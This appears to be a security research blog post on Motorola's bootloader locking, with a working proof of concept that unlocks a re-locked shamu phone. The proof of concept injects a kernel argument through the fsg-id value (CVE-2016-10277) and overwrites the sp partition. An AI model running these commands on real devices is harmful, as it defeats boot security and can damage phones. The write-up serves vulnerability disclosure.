Motorola Android Bootloader Unlocking a Re-locked Bootloader from Platform OS

Back in 2013, Dan Rosenberg found a vulnerability in the Motorola TrustZone kernel, allowing him to unlock the Motorola bootloader. In his blog, Dan depicted how Motorola implemented bootloader locking (also relevant for shamu), which can be summarized as the following state machine:

 .---------.
 | Factory |       .----------.
 | Locked  | --->  | Unlocked |  <---.  (3)
 `---------' (1)   `-----.----'      |      
                         |      .-----------.
                         `----> | Re-locked |
                           (2)  `-----------'

The transitions are as follows:

1. The user first unlocks the device. The WARRANTYVOID qfuse is blown. This transition is governed by TEE thus it cannot be done from the Platform OS.
2. User re-locks the device. Bootloader writes an entry under the sp partition, with an HMAC produced by TEE.
3. User unlocks the device. Bootloader removes that entry.

Conclusion: An unrestricted root (as one could gain by exploiting @CVE-2016-10277) can unlock a re-locked bootloader by invalidating the sp partition.

 $ fastboot getvar all
 ...
 (bootloader) secure: yes
 (bootloader) unlocked: no
 (bootloader) securestate: locked
 (bootloader) iswarrantyvoid: yes
 (bootloader) mot_sst: 2
 
 $ fastboot oem config fsg-id "a initrd=0x11000000,1519997"
 $ fastboot flash foo initroot.cpio.gz
 $ fastboot continue
 
 $ adb shell
 shamu:/ # echo 0 > /dev/block/platform/msm_sdcc.1/by-name/sp
 shamu:/ # reboot bootloader
 
 $ fastboot getvar all
 ...
 (bootloader) unlocked: yes
 (bootloader) securestate: unlocked
 (bootloader) iswarrantyvoid: yes
 (bootloader) mot_sst: 3